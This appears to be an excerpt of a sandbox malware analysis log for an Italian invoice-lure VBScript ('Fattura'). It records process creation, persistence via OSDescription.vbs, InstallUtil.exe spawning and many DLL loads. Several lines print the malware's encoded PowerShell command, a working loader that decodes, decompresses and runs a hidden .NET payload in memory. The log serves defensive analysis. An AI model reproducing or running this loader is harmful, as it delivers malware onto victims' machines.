B3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: workfoldersshell.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: shacct.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: idstore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: starttiledata.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wlidprov.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: provsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: usermgrproxy.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: acppage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: atl.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll Jump to behavior
